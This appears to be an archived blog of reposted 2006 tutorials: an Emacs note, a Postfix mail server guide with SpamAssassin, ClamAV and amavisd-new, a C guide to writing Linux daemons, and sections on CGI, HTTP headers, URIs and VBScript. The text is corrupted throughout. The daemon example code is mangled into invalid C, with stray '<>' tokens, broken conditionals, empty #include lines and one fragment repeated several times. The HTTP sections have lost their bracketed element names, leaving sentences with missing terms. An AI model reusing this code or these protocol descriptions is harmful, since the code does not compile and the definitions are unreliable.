Emacs is also extensible, and there are a number of Emacs modes that make things even easier. The html-helper-mode, for example, provides shortcuts to insert HTML tags and entities, and even an entire HTML document "skeleton" with all the basic tags a document needs. The html-helper-mode also brings support for basic CSS.

The Transparent Remote (file) Access, Multiple Protocol (TRAMP) package makes it easy to edit files on remote servers with Emacs. TRAMP works over Remote Shell (RSH), SFTP, and SSH (scp).

Of course, the other benefit to Emacs is that you can do pretty much anything from the editor. Want to read email from Emacs? No problem. Want to chat in IRC using Emacs? You can do that too. This has little to do with Web development, but if you "live" in Emacs already, you probably want to do your Web development with it as well.

Emacs, like Vim, is fairly complex -- it's very powerful, but it will probably take novice users a while to master.

Implementing a Postfix

2006-09-04T16:46:00.000+07:00

Implementing a Postfix mail server with spam and antivirus protection

Building a complete email system with spam and antivirus protection is not as hard as you might think. This guide will walk you through installing and configuring everything you need for sending and receiving email, filtering spam, and scanning for viruses in email.

For our system, we'll use the Postfix mail transport agent (MTA); Dovecot, a secure, open source IMAP and POP3 server for Linux/Unix-like systems; SquirrelMail, a standards-based Webmail package written in PHP 4; SpamAssassin, a powerful open source spam filter; and ClamAV, a GPLed virus scanner. To tie everything together we'll use amavisd-new, a high-performance interface between MTAs and content checkers such as virus scanners and spam filters.

The system will be configured so that users will have POP, secure POP, IMAP, and secure IMAP (IMAPS) access, and will also be able to access their email from the Web using SquirrelMail. Every email sent or received will be scanned for viruses and checked for possible spam content.

The email applications will run on Fedora Core 4 and Red Hat Enterprise Linux Advanced Server 4.

To install the packages for this project we will use the Yellow Dog Updater, Modified (Yum). In order to get all the packages that you need, make sure you have the Fedora Extras repository (/etc/yum.repos.d/fedora-extras.repo; it's included in the distribution and enabled by default) and Dries repository enabled and configured. You will need both repositories in order to install all the packages needed.

Installation

To begin, you'll want to make sure your system is up-to-date. Run yum update if you haven't already.
Now configure the Dries repository for use by creating a file called /etc/yum.repos.d/dries.repo, with the following entries:

[dries]
name=Extra Fedora rpms dries - $releasever - $basearch

baseurl=http://ftp.belnet.be/packages/dries.ulyssis.org/fedora/linux/$releasever/$basearch/dries/RPMS/
enabled=1
gpgcheck=1

Next, install the GPG key for this repository:
rpm --import http://dries.ulyssis.org/rpm/RPM-GPG-KEY.dries.txt

Now that you have the repositories ready, you can install the packages that we need:

yum install postfix dovecot spamassassin squirrelmail clamav clamav-server clamav-update clamav-lib clamav-data amavisd-new

Wait until all the packages and dependencies are installed.
By default, Fedora and Red Hat distributions come with sendmail set as the MTA for the system. You can check or change the default MTA with the system-switch-mail utility. If you don't have it installed yet, install it now:
yum install system-switch-mail system-switch-mail-gnome
Simply run the system-switch-mail tool and select Postfix as your default MTA.

Now that you have all the necessary applications and tools installed, it's time to configure them to work together.

Setting up Postfix

To configure Postfix, edit the main Postfix configuration file /etc/postfix/main.cf and change these entries as follows:

#This is your fully qualified domain name (FQDN):

myhostname = mail.srv.dyndns.org
#myorigin specifies the default domain name that is appended
myorigin = $mydomain
#By the parameter "all" we allow the connections to our server
# from anywhere, not only from localhost
inet_interfaces = all
#The mydestination parameter specifies the list of domains that
#this machine considers itself the final destination for.
mydestination = $mydomain, $myhostname, localhost.$mydomain, localhost
#Reject the unknown users
local_recipient_maps = unix:passwd.byname $alias_maps
#With this parameter we make sure that our server won't be an open relay server
mynetworks_style = host

The configuration file is well commented, so if you need more info about the configuration, dig into it. For even more information on Postfix, see the Postfix.org documentation.

Next, start the Postfix service with the command service postfix start. Also make sure the service is automatically started at boot time:

chkconfig postfix on

Setting up Dovecot
Now it's time to set up Dovecot. Edit the Dovecot config file, /etc/dovecot.conf, to suit your needs. In this case we want to enable POP3, secure POP3, IMAP, and secure IMAP services as shown:

protocols = imap imaps pop3 pop3s
imap_listen = *
pop3_listen = *
imaps_listen = *
pop3s_listen = *

After that's done, start the Dovecot service and make sure that it's started at boot time:

service dovecot start
chkconfig dovecot on

Setting up Squirrelmail
In order to be able to use webmail, you need to have Apache's httpd service up and running. It shouldn't be necessary to do any extra configuring of httpd config file for this task, so you can just use it as is. Start the service and make sure it's started at boot time:

service httpd start
chkconfig httpd on

The installation of Squirrelmail will not change your httpd.conf file. Instead, Squirrelmail creates the file squirrelmail.conf in /etc/httpd/conf.d. This file links the /webmail/ virtual folder to the actual Squirrelmail folder installation located at /usr/share/squirrelmail.

Edit the /usr/share/squirrelmail/config/config.php file and change the domain$ variable to match your domain name, in order to make the from-domain setting (when sending email from Web) correct. For our server, it looks like this:

$domain = 'srv.dyndns.org';

To test webmail, go to http://localhost/webmail/ or http://your_domain_name/webmail/ and log in to check your email and send a few test messages.

Blocking spam and viruses
SpamAssassin is configured right out of the box when you install it, so you shouldn't need to change anything here. However, to reduce the chance that a false positive will tag known addresses, you can whitelist addresses. The file /etc/mail/spammassassin/local.cf should list known email addresses, in a format similar to:

whitelist_from anzevi@some-strange-domain.com
whitelist_from anze@out-there-somewhere.net

Spamassassin will be called by amavisd-new, so we don't need to configure the SpamAssassin daemon to start at boot time.

To block viruses, we need to configure ClamAV to connect daily to an Internet-based antivirus database and fetch new virus definitions. You need to have a cron daemon running in order for ClamAV to fetch the virus definitions.

First, edit /etc/sysconfig/freshclam and comment out the following line:

#FRESHCLAM_DELAY=disabled-warn # REMOVE ME

Next, edit /etc/freshclam.conf and change the antivirus database to the closest mirror to your location:

#Example
DatabaseMirror db.de.clamav.net

You can see a list of available mirrors here.
To test ClamAV, run the clamscan command in your home folder. The AV client should check your home directory and subdirectories for viruses. Since you are running this check on a Linux box for local files, I'm pretty sure ClamAV won't find any viruses on your machine.

To test updating the virus definitions, run freshclam.

Setting up amavisd-new
Now we'll set up amavisd-new. The user amavis is automatically created at amavisd-new install time, but we still need to create the following directories and make sure the owner is amavis, as shown below:

mkdir /var/run/amavis
mkdir /var/run/clamav
chown amavis /var/run/amavis
chown amavis /var/run/clamav

You may leave the group permissions of the folders set to root. Copy the sample config file to /etc:
cp /usr/share/doc/clamav-server-X.XX.X/clamd.conf
/etc/clamd.conf

Replace the X.XX.X with the version you're using. Then, make the following changes to your /etc/clamd.conf file:

#Example
User amavis
#TCPSocket 3310
#PidFile /var/run/clamd./clamd.pid
#LocalSocket /var/run/clamd./clamd.sock

After making the changes, start the service with service amavisd start, and set it to start at boot with chkconfig amavisd on.

Now, test your configuration to see that everything works. Telnet to port 10024 and you should see something like this:

[root@mail ~]# telnet localhost 10024

Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 [127.0.0.1] ESMTP amavisd-new service ready
quit
221 2.0.0 [127.0.0.1] amavisd-new closing transmission channel
Connection closed by foreign host.

If you are able to telnet to port 10024 and you are greeted by amavisd-new, you've done a good job and you may continue with the configuration. If you're unable to connect to that port, make sure the amavisd service is running, and look for errors in /var/log/messages.

Additional Postfix configuration

Once amavisd is configured and working correctly, you need to configure Postfix so it knows how to communicate with amavisd-new. Copy the following lines to the bottom of your existing /etc/postfix/master.cf file:

smtp-amavis unix - - y - 2 smtp
-o smtp_data_done_timeout=1200
-o smtp_send_xforward_command=yes
-o disable_dns_lookups=yes
-o max_use=20
127.0.0.1:10025 inet n - y - - smtpd
-o content_filter=
-o local_recipient_maps=
-o relay_recipient_maps=
-o smtpd_restriction_classes=
-o smtpd_delay_reject=no
-o smtpd_client_restrictions=permit_mynetworks,reject
-o smtpd_helo_restrictions=
-o smtpd_sender_restrictions=
-o smtpd_recipient_restrictions=permit_mynetworks,reject
-o mynetworks_style=host
-o mynetworks=127.0.0.0/8
-o strict_rfc821_envelopes=yes
-o smtpd_error_sleep_time=0
-o smtpd_soft_error_limit=1001
-o smtpd_hard_error_limit=1000
-o smtpd_client_connection_count_limit=0
-o smtpd_client_connection_rate_limit=0
-o receive_override_options=no_header_body_checks,no_unknown_recipient_checks

You can find more information how this work in the amavisd documentation in your /usr/share/doc folder. For example, since we're running amavisd 2.3.3, we would check the /usr/share/doc/amavisd-new-2.3.3/README.postfix file.

Save the file and reload the Postfix service, then test it by using telnet to connect to port 10025:

[root@mail ~]# telnet localhost 10025
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 mail.srv.dyndns.org ESMTP Postfix
quit
221 Bye
Connection closed by foreign host.

If this works for you, you have a working configuration, and you are ready to make the final changes to Postfix.

Add this line to the end of /etc/postfix/main.cf:
content_filter = smtp-amavis:[127.0.0.1]:10024

Once you've done this, Postfix will send all incoming and outgoing mail directly through the content filter that you configured earlier.
Conclusion
All you have to do now is send yourself some clean email messages and some spam, junk, and viruses, and see what's happening on your mail server. You can find sample messages with spam and virus content in /usr/share/doc/amavisd-new-X.X.X/test-messages folder. The best way to see in real time what is going on your mail server is to watch /var/log/maillog for entries using tail -f /var/log/maillog.

That's all you need to do to configure Postfix and the helper applications to provide antivirus, spam filtering, webmail, POP, and IMAP access. Enjoy your new mail server!

linux Daemon

2006-09-04T16:43:00.000+07:00

1. Introduction: What is a Daemon?

A daemon (or service) is a background process that is designed to run autonomously,with little or not user intervention. The Apache web server http daemon (httpd) is one such example of a daemon. It waits in the background listening on specific ports, and serves up pages or processes scripts, based on the type of request.

Creating a daemon in Linux uses a specific set of rules in a given order. Knowing how they work will help you understand how daemons operate in userland Linux, but can operate with calls to the kernel also. In fact, a few daemons interface with kernel modules that work with hardware devices, such as external controller boards, printers,and PDAs. They are one of the fundamental building blocks in Linux that give it incredible flexibility and power.

Throughout this HOWTO, a very simple daemon will be built in C. As we go along, more code will be added, showing the proper order of execution required to get a daemon up and running.
2. Getting Started

First off, you'll need the following packages installed on your Linux machine to develop daemons, specifically:

GCC 3.2.2 or higher
Linux Development headers and libraries

If your system does not already have these installed (not likely, but check anyway), you'll need them to develop the examples in this HOWTO. To find out what version of GCC you have installed, use:

gcc --version
3. Planning Your Daemon
3.1 What Is It Going To Do?

A daemon should do one thing, and do it well. That one thing may be as complex as managing hundreds of mailboxes on multiple domains, or as simple as writing a report and calling sendmail to mail it out to an admin.

In any case, you should have a good plan going in what the daemon should do. If it is going to interoperate with some other daemons that you may or may not be writing, this is something else to consider as well.
3.2 How Much Interaction?

Daemons should never have direct communication with a user through a terminal. In fact, a daemon shouldn't communicate directly with a user at all. All communication should pass through some sort of interface (which you may or may not have to write), which can be as complex as a GTK+ GUI, or as simple as a signal set.
4. Basic Daemon Structure

When a daemon starts up, it has to do some low-level housework to get itself ready for its real job. This involves a few steps:

Fork off the parent process
Change file mode mask (umask)
Open any logs for writing
Create a unique Session ID (SID)
Change the current working directory to a safe place
Close standard file descriptors
Enter actual daemon code
4.1 Forking The Parent Process

A daemon is started either by the system itself or a user in a terminal or script. When it does start, the process is just like any other executable on the system. To make it truly autonomous, a child process must be created where the actual code is executed. This is known as forking, and it uses the fork() function:
pid_t pid;

/* Fork off the parent process */
pid = fork();
if (pid <> 0) {
exit(EXIT_SUCCESS);
}

Notice the error check right after the call to fork(). When writing a daemon, you will have to code as defensively as possible. In fact, a good percentage of the total code in a daemon consists of nothing but error checking.

The fork() function returns either the process id (PID) of the child process (not equal to zero), or -1 on failure. If the process cannot fork a child, then the daemon should terminate right here.

If the PID returned from fork() did succeed, the parent process must exit gracefully. This may seem strange to anyone who hasn't seen it, but by forking, the child process continues the execution from here on out in the code.
4.2 Changing The File Mode Mask (Umask)

In order to write to any files (including logs) created by the daemon, the file mode mask (umask) must be changed to ensure that they can be written to or read from properly. This is similar to running umask from the command line, but we do it programmatically here. We can use the umask() function to accomplish this:

pid_t pid, sid;

/* Fork off the parent process */
pid = fork();
if (pid <> 0) {
exit(EXIT_SUCCESS);
}

/* Change the file mode mask */
umask(0);

By setting the umask to 0, we will have full access to the files generated by the daemon. Even if you aren't planning on using any files, it is a good idea to set the umask here anyway, just in case you will be accessing files on the filesystem.
4.3 Opening Logs For Writing

This part is optional, but it is recommended that you open a log file somewhere in the system for writing. This may be the only place you can look for debug information about your daemon.
4.4 Creating a Unique Session ID (SID)

From here, the child process must get a unique SID from the kernel in order to operate. Otherwise, the child process becomes an orphan in the system. The pid_t type, declared in the previous section, is also used to create a new SID for the child process:
pid_t pid, sid;

/* Fork off the parent process */
pid = fork();
if (pid <> 0) {
exit(EXIT_SUCCESS);
}

/* Change the file mode mask */
umask(0);

/* Open any logs here */

/* Create a new SID for the child process */
sid = setsid();
if (sid < pid =" fork();"> 0) {
exit(EXIT_SUCCESS);
}

/* Change the file mode mask */
umask(0);

/* Open any logs here */

/* Create a new SID for the child process */
sid = setsid();
if (sid < pid =" fork();"> 0) {
exit(EXIT_SUCCESS);
}

/* Change the file mode mask */
umask(0);

/* Open any logs here */

/* Create a new SID for the child process */
sid = setsid();
if (sid < pid =" fork();"> 0) {
exit(EXIT_SUCCESS);
}

/* Change the file mode mask */
umask(0);

/* Open any logs here */

/* Create a new SID for the child process */
sid = setsid();
if (sid < h="">
#include
#include
#include
#include
#include
#include
#include
#include

int main(void) {

/* Our process ID and Session ID */
pid_t pid, sid;

/* Fork off the parent process */
pid = fork();
if (pid <> 0) {
exit(EXIT_SUCCESS);
}

/* Change the file mode mask */
umask(0);

/* Open any logs here */

/* Create a new SID for the child process */
sid = setsid();
if (sid <> /* Log the failure */
exit(EXIT_FAILURE);
}

/* Change the current working directory */
if ((chdir("/")) <> /* Log the failure */
exit(EXIT_FAILURE);
}

/* Close out the standard file descriptors */
close(STDIN_FILENO);
close(STDOUT_FILENO);
close(STDERR_FILENO);

/* Daemon-specific initialization goes here */

/* The Big Loop */
while (1) {
/* Do some task here ... */

sleep(30); /* wait 30 seconds */
}
exit(EXIT_SUCCESS);
}

From here, you can use this skeleton to write your own daemons. Be sure to add in your own logging (or use the syslog facility), and code defensively, code defensively, code defensively!

How CGI Data Is Handled

2006-09-04T15:50:00.000+07:00

When writing a CGI application, the developer has the same two concerns that developers of all applications have: data input and data output. This section discusses how data is input into a CGI application. The closing section of the chapter ("Returning the Results to the Client") discusses how data is output by the application.

In the UNIX environment, CGI applications receive their data from command line arguments, environment variables, and the standard input (known as stdin to C programmers). By querying the value of one of a predefined set of these variables, the UNIX CGI application can determine the server context that it has been run under and the data that was entered at the client side. The application then returns its data to the server using the standard output (stdout).

In the various Windows environments (Windows 3.x, Windows 95, and Windows NT), the operating system makes the use of environment variables and the standard input/output difficult. For this reason, the Win/CGI interface uses a spooling paradigm for passing data between the server and the CGI application. Before executing the CGI application, the server creates a CGI data file. This file contains the same data fields that are used in UNIX CGI applications, along with fields specific to Win/CGI. The name of the data file is passed to the CGI application as a command line argument. Likewise, the CGI application places its output into a file whose location the server specifies in one of the fields of the CGI data file.
Decoding the HTML Form

As you learned in Chapter 2, the client is not limited to simply retrieving resources from HTTP servers. There are also two HTTP request methods that allow the client to interact in some way with a resource.

The first method uses a GET request message that includes search terms in the resource address:

GET //myserver.com/cgi-win/search.exe?last=smith+first=jim

This request message could have been generated by clicking the Submit button of a form or by some sort of user agent. Likewise, the user of a Web browser such as Netscape could enter the address portion of this string into the text box provided for Web addresses. Any of these three actions causes the HTTP server to launch search.exe and pass it the search text that appears after the "?".

The second method uses a POST request message. The difference between a POST message and the GET message illustrated previously is that the POST message uses the portion of the message to transfer the form data. This method is used by the Submit button or by a user agent. Because the form data entered on the HTML form is sent in the , it cannot be entered into the address box of a Web browser.

With the second method, the Win/CGI interface requires that the server parse the HTML form data from the POST message it received. This data is then stored in either the CGI data file previously discussed or in an external file. In the later case, the server places an entry in the CGI data file that specifies the filename and length of this external file. The client application uses theContent-Type entity header to specify how the data is encoded in the . There are two Content-Types used: application/x-www-urlencoded and multipart/form-data. The first is the Content-Type used in most cases. The second Content-Type provides for uploading files from the client by using a multipart MIME message. To date, multipart MIME messages are not widely used in HTTP messages. The Content-Type header is passed to the CGI application as one of the fields in the CGI data file.

Combining Visual Basic and the Web

2006-09-04T15:49:00.000+07:00

The merging of Visual Basic and the ability to tie into real-time, distributed information using the Internet produces an interesting and very powerful tool. In the constant flux of the Internet, Visual Basic becomes a very practical choice for Web application development thanks to Visual Basic's rapid application development aspect.

Visual Basic can be used to create both client-side and server-side Web applications. A Web browser such as Microsoft's Internet Explorer is one example of a client-side application. It is used to "surf" the Web-browsing the Web pages at a Web site and moving to other pages or to a completely different Web site by using the hyperlinks provided on most Web pages. Another example of a client-side application is an application that retrieves stock quotes from a quote provider's Web sites and provides the quotes to the user in some fashion. This application is not a Web browser but does access Web-based information.

Server-side applications run alongside a Web server, such as Microsoft's Internet Information Server. The server-side application is executed under the direction of the Web server, typically in response to a request made by a client-side application such as a Web browser. Server-side applications typically serve as gateways between a user's Web browser and information stored on the Web server that is not typically accessible using a Web browser. Such information can include database tables, information-providing machines attached to the server, and even OLE-enabled applications to which the server has access.

Portion of HTTP Messages

2006-09-04T15:47:00.000+07:00

The bulk of response messages and a few types of request messages include an element and can also include an element. In a response message, the portion is the actual data resource that is being transferred. For instance, if the request message GET //myserver.com/home.html HTTP/1.0 is received by a server, the entity portion of the response message will be the file home.html located in the Web server's root directory.

In a request message, the element is used for POSTing information to a Web server. This is used typically for submitting information entered into an HTML form by a human user or for queries being performed by some automated user-agent application.

The remainder of this section discusses the element.

Entity Header Fields
The element's fields provide additional information about the or, if the is not present (as in the case of HEAD requests), about the resource requested. These headers are optional. If sent element fields are returned, they generally follow the fields.

The following line shows the format for the element:

Entity-Header = Allow | Content-Encoding | Content-Length | Content-Type |
Expires | Last-Modified |

The element provides for the addition of new element fields without changing the entire protocol. However, if a user agent does not recognize an element field it is (and should be) ignored.

Allow

The Allow field is used to indicate which methods are supported by the resource requested in the request message. The format of the header field is
Allow = "Allow:" 1#method

An example is Allow: GET, HEAD. This header field is used to inform the user agent of which methods are valid for the resource being requested. However, it does not specify which methods are implemented by the server. Also, the use of this field does not prevent the user agent from attempting to perform other methods upon the resource. Nevertheless, it is good practice to follow the advice of this header field.

Content-Type, Content-Encoding, and Content-Length

These header fields indicate the type of resource being returned, how it is encoded, and the size of the being returned. The following lines show the respective formats for these headers:

Content-Type = "Content-Type:"
Content-Encoding = "Content-Encoding:"
Content-Length = "Content-Length:" 1*DIGIT

The Content-Type header indicates the media type used for the element. It essentially documents the format of the entity being transferred. The typical HTML document is sent with a Content-Type of text/html. If the request method is HEAD, the Content-Type represents the media type that would be returned if the request is a GET.

The Content-Type field can be used by the user agent to determine how to present the resource to the user. The content types are used by Web browsers when setting up helper applications that are external applications used to display specific file types (also known as media types). For instance, a Content-Type of audio/basic represents a sound file that the typical Web browser has to present to the user through an external application.

The Content-Encoding field is a modifier to the Content-Type header and indicates whether and how a resource has been encoded before transmission. This is used when a resource has been compressed, for example. The user agent must use the encoding information in order to decode the data received before presenting it to the human user.

The Content-Length indicates the size of the element. It is used in both request and response messages and is, in fact, required in request messages. The size is the number of octets sent to the recipient. If the message is a response to a HEAD request, the Content-Length field indicates the size that would have been returned by a response to a GET request on the same resource.

Expires

As the name of this header field indicates, the Expires entity header indicates the date after which the entity should be considered expired or invalid. This can be returned by applications that are generating real-time data, for example, to indicate the date (and time) after which the entity should be considered as old news. Caches should not retain the entity after the date specified.
The presence of an Expires header does not mean that the resource will change or no longer exist after the value specified, but simply that it will be "stale" (to use the wording from the Internet-Draft). If the value specified is 0 or is an invalid HTTP date, the resource should be considered as immediately expired and should not be cached in any way.

The format for the Expires header is

Expires = "Expires:"
Last-Modified

The Last-Modified header field indicates the date that the server believes the resource was last changed. The value is interpreted differently depending on the nature of the resource being transferred. This header can be used to determine whether a new copy of a resource should be retrieved or if the user should be notified that the resource has been changed. For a file resource, it is most likely to be the date that the file was last saved. For a database resource, this field can be used to indicate the date a record was last updated. The possibilities are endless.

The format for the Last-Modified header is
Last-Modified = "Last-Modified:"

When you write server-side applications, it is important to think about how this field should be used if the resource is time-sensitive. If you're writing a user-agent application, take care when attempting to interpret this field's value.

HTTP Request Messages

2006-09-04T15:44:00.000+07:00

The HTTP Request message is the mechanism used to retrieve a data resource from a server. In order to maintain backward compatibility with the previous version of the HTTP protocol, the HTTP/1.0 protocol provides for both a full request (for HTTP/1.0) and a simple request (for HTTP/0.9) style of message. If an HTTP/1.0 server receives a simple request message, it must respond with an HTTP/0.9-compatible simple response message. Likewise, an HTTP/1.0 client should always generate a full request message.

Request Methods

As mentioned in the previous section, the syntax of the full-request message includes an element named , which has the following rule:

Method = "GET" | "HEAD" | "POST" |

The element indicates what operation should be performed on the data resource specified by the element. The acceptable methods for a given resource can change at any time. If a method is not allowed for a resource, the client receives notification of this in the and elements of the response message.

The following sections describe the named methods. The element allows for extensions to the HTTP/1.0 protocol. Both client and server must recognize these extended methods or the server will likely return a of 501 (not implemented).

The GET Method

As perhaps the easiest method to understand, the GET method merely instructs the server to return to the client the resource indicated by the element of the request message. If the points to a server application, the server returns the data output by the application, not the application itself.

Also, a Request-Header field named If-Modified-Since creates a conditional GET request. If the resource has been modified since the time value specified in the header, the resource is returned. If it has not been modified since that time, the server responds with a status code of 304 (not modified) and with no entity in the response message. This header field is used to perform client-side caching and to reduce network load.

The HEAD Method

The HEAD method is nearly identical to the GET method. The very important difference, however, is that the server must return only HTTP header information related to the resource. The resource (entity) itself must never be returned in response to a HEAD request.

The HEAD method allows spiders and agents operating on the Web to retrieve only necessary header information about a particular resource. This can be useful when checking the validity of hypertext links or checking a resource to see whether it has been modified since a particular date.

The POST Method

The POST method is used when sending entity information to a server. For instance, POST is used when filling out an HTML form on a Web page. The Submit button on the form typically performs a POST request and appends the form's field values to the request message as the element.

The POST method is usually performed on some type of application resource as opposed to a document resource. A successful POST request does not require the server to return an element in the response message. In some cases, the action may not produce a resource that can be identified by a URI. If no is returned, the server should indicate a of 200 (okay) or 204 (no content). If the action does produce an , the should return as 201 (created) and, of course, the should be transmitted to the client.

An entity header field called Content-Length is required on all POST messages. If it is invalid or missing, the server returns a or 400 (bad request).

Request Message Header Fields

The full-request message can contain any number of header fields that can be used to qualify the request or to provide information about the client making the request. The syntax for the request header is
Request-Header = Authorization | From | If-Modified-Since | Referer | User-Agent

Additional field names can be added only if all applications involved in a conversation recognize them as request header fields. Otherwise, unrecognized fields are considered Entity-Headers.

Authorization

The Authorization request-header field is used by user agents that wish to present some sort of credentials to the server. The format of the field is

Authorization = "Authorization:"

More on authentication appears in the last section of this chapter.

From

The From request-header field is sent by a user agent that wishes to provide the e-mail address of the person who is at the helm. The address should be a valid mailbox and should be sent only with the user's express knowledge and permission. This field should always be used by Web robots and crawlers to provide the e-mail address of the person who started the robot. The format of the field is as follows:

From = "From:"
If-Modified-Since

As mentioned in the section titled "The GET Method," the If-Modified-Since header field is used to produce a conditional GET request. The field uses this format:

If-Modified-Since = "If-Modified-Since:"

The resource is returned to the client only if the resource has been modified since the date specified in the element. If the element specifies an invalid date or if the date is later than the server's current date, the server essentially ignores the header field and returns the resource as though it is responding to a normal GET request.

Referer
The Referer header field specifies the URI of the resource from which the request message's element was obtained. This field must be sent only if the field has actually been obtained from a source that has an address. If a user has generated the element value (by typing in the address or selecting from a bookmark list, for example), this field must not be sent. It uses this format:
Referer = "Referer:"

User-Agent
User-Agent contains information about the user agent that generated the request message. This request-header field is useful to the server in logging server activity and also for creating responses that are specific for the given user agent. The field is not required but should be sent as a courtesy to the server, using this format:

User-Agent = "User-Agent:" 1*( | )

The convention for the element is to list the information in order of significance. Typically, this field's values include the product name of the user agent, the product version, and sometimes the operating system the user agent is running under.

Addressing on the Web

2006-09-04T15:43:00.000+07:00

As mentioned in the preceding section, HTTP is used to transfer data objects from a server machine to a client. In order to make this transfer happen, the two applications involved in the conversation must recognize a common addressing mechanism. This addressing mechanism must uniquely identify every data object available not only on the server application machine, but also on the entire network the applications are using for communication. The addressing scheme must also be familiar to programmers and publishers on the Web because addresses must be used both to gather and to publish information or services on the Web.

The Web uses a form of address known as a Universal Resource Identifier (URI) to identify data objects on servers. The URI for an object is independent of which protocol is used to access the data. An object's URI also provides no real clue as to what type of data is being identified. However, most URIs include a filename extension (similar to the DOS filename extension) that can be used by the client application as a clue to how the object should be presented to the user. For example, a Web site dedicated to gardening may have a file named roses.htm, which is most likely an HTML document, and perhaps a file named roses.gif, which is probably a picture of roses.

The more common form of a URI is known as a Universal Resource Locator (URL). This is typically what is specified when you see a list of Web pages. A URL is a URI that contains protocol information specifying how the data object should be retrieved from the server. The difference is subtle but important. Here are a few examples that should clear up any confusion you may have:

URI: //myserver.com/user1/default.htm

URL: http://myserver.com/user1/default.htm

URI: //ftp.myserver.com/demos/demo.zip

URL: ftp://ftp.myserver.com/demos/demo.zip

The first two examples illustrate the crucial difference between a URI and a URL. The URL informs the machine at address myserver.com to retrieve a file named default.htm for its /user1 directory and return it to the client using the HTTP protocol. The URI merely defines the location of the file; whereas, the URL specifies how it should be retrieved.

Similar to DOS, the URI can contain either absolute or relative addressing. For instance, if you are viewing (or creating) a Web-based document with a URI of //myserver.com/user1/default.htm, you can use the following addressing mechanisms within the document:

* //myserver.com/home/file2.htm would specify an absolute path.

* file3.htm would specify a relative path equivalent to //myserver.com/user1/file3.htm.

* /file4.htm would specify a relative path equivalent to //myserver.com/file4.htm.

Another similarity to DOS in specifying a URI is that the URI cannot contain any spaces and must encode certain reserved characters. If whitespace is required within a URI, you must encode the space as the string "%20". So, a directory named "My Documents" if used in a URI would appear as "My%20Documents". Similarly, there are several reserved characters that have special meanings within a URI. These are outlined in Table 2.2. These reserved characters, if actually meant to appear within a URI, must be encoded using the ISO Latin-1 character set.

The http portion is used to indicate that the resource is to be retrieved using the HTTP proto-col. The is the Internet hostname or IP address for the machine on which the resource resides. The port, which is a numeric value, is an optional parameter necessary if the server is not listening on TCP port 80 (which is the value assumed if is not specified). The portion is either an absolute path or relative path locating the resource within the server's file structure. If the is not specified, the server should respond with a default HTML file. This method is typically used to access the site's home page. You can specify the , however, if you know the exact URL for the resource you're interested in. The default file's location is typically set up in the server software's setup or configuration program. If the resource can be searched, the ? portion can be provided to instruct the server on how the resource should be searched. This item is both server and resource specific. Later chapters address these searchable resources in-depth.

HTTP as a Client/Server Protocol

2006-09-04T15:41:00.000+07:00

As you can probably guess from Table 2.1, the HTTP protocol defines a client/server model. The difference between HTTP and typical client/server protocols, however, is that either role can be played by either computer involved in the conversation. The role a given computer plays during the conversation depends on the resource being accessed and possibly the HTML contained by the resource.

Another very important difference is the fact that the HTTP is a stateless protocol. Users are not required to go through a logon process, which is typical of most client/server systems. In fact, the majority of HTTP data transfers are completely anonymous-beyond the machine address of the client, the server has no knowledge of who is retrieving data from it. In addition to the lack of user information, the HTTP protocol provides no mechanism for tracking how long a client may actually utilize information it has retrieved or for knowing what a client may have done before requesting a resource from the server.

The typical HTTP conversation contains the following steps, which are illustrated in Figure 2.2.

1. A client opens a connection with a server. Recall that any computer can act as a client, even if the computer is running a server application.
2. The client sends a request to the server. This request consists of a request method, a resource or service address, and possibly other header fields, and body content. These concepts are discussed in the following sections.
3. The server returns to the client a status line, possible header information, and (usually) an entity section.
4. The server closes the connection.

There is always the possibility on the global Internet that a connection can fail at any time. The HTTP protocol provides that both the client and server applications must be prepared for such a situation. The loss of connection can occur due to user interaction, a communication time-out, or an application failure. A loss of connection is considered to terminate the client's current request. This means that, regardless of the state of the request when the termination occurs, the client must restart the entire process to properly attempt to access the resource again.

In addition to this drawback, the HTTP protocol allows for only a single resource to be transferred during a connection. This means that if a hypertext page has embedded references to other resources (such as images), the client must retrieve each resource individually through separate connections. For example, to construct the Web page of Figure 2.1, the Web browser had to make three connections. One to retrieve the HTML file, another to retrieve the embedded Java applet, and a third to retrieve the Under Construction picture. This shortcoming of HTTP has often been blamed for the slow response time of the Web.

VBScript-VBA for the Web

2006-09-04T15:39:00.001+07:00

Visual Basic Script, herein referred to as VBScript or VBS, is Microsoft's answer to Sun's JavaScript. Both are meant to be intertwined in HTML code; both are meant to expand on the client side functionality of the Web, and neither of the two are fully released products. (VBScript is in beta with MS-Internet Explorer 3.0. JavaScript was first implemented in Netscape 2.0.)

http://www.microsoft.com/vbscript
The resource for information on Visual Basic Script is the Microsoft Web site (http://www.microsoft.com/vbscript). Here you can find complete documentation, some sample snippets of VBScript code, and links to sites using VBScript.
Variables
In most languages, variables are an important part of the language, its structure, and its implementation. In VBScript, the variables are all of the same type, Variant.
The Variant type is an "all things to all people" generic data type. Assign it a string, and it acts as a string; assign it a number, and it acts like a number. The following lines are an example of declaring a Variant in VBScript:
The SCRIPT LANGUAGE tag is a proposed addition to the HTML standard and is first implemented in the Microsoft Internet Explorer 3.0 It informs the browser that code, which must be interpreted, is coming and of what type it is. The usual as Variant, (like you would see in a regular Visual Basic program) is omitted because the Variant type is the only one available. Multiple variables per line are allowed-the procedure is to separate each by a comma. The Option Explicit keyword is implemented in Visual Basic Script, and if used, it should appear as the first statement after the

Visual Basic Script Statement Overview

2006-09-04T15:39:00.000+07:00

Visual Basic Script supports a subset of the Visual Basic statements. The following list are the functions supported:

Call statement
Dim statement
Do-Loop statement
Erase statement
Exit statement
For-Next statement
For Each-Next statement
Function statement
If-Then-Else statement
Let statement
LSet statement
Mid statement
MsgBox statement
On Error statement
Private statement
Public statement
Randomize statement
ReDim statement
Rem statement
RSet statement
Set statement
Static statement
Sub statement
While-Wend statement

Visual Basic Script Functions Overview

The following is a list of functions and objects that are supported by Visual Basic Script and operate similarly to the VB counterparts:

Abs function
Asc function
Atn function
Chr function
Cos function
Date function
DateSerial function
DateValue function
Day function
Exp function
Hex function
Hour function
InputBox function
InStr function
Int, Fix functions
LBound function
LCase function
Left function
Len function
Log function
LTrim, RTrim, and Trim functions
Mid function
Minute function
Month function
MsgBox function
Now function
Oct function
Right function
Rnd function
Second function
Sgn function
Sin function
Sqr function
Str function
StrComp function
String function
Tan function
Time function
TimeSerial function
TimeValue function
UBound function
UCase function
Val function
VarType function
Weekday function
Year function

The following sections provide information regarding new functions or functions that behave differently than their VB counterparts.

The Array Function
